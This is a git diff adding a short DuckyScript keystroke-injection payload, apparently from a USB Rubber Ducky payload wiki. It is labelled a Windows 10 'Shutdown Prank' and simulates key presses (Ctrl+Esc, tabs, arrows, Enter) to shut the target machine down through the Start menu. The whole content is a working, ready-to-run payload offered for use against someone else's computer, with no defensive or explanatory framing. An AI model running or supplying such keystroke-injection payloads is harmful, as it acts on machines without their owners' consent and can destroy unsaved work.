diff --git a/Payload-Windows-10:-Shutdown-Prank.md b/Payload-Windows-10:-Shutdown-Prank.md index dfdc38d..eda7a83 100644 --- a/Payload-Windows-10:-Shutdown-Prank.md +++ b/Payload-Windows-10:-Shutdown-Prank.md @@ -1,17 +1,33 @@ REM Author: Alexander Yakovlev https://github.com/toxydose + DELAY 1500 + CONTROL ESCAPE + DELAY 3500 + TAB + DELAY 200 + TAB + DELAY 200 + TAB + DELAY 200 + ENTER + DELAY 200 + DOWNARROW + DELAY 200 + DOWNARROW + DELAY 200 + ENTER \ No newline at end of file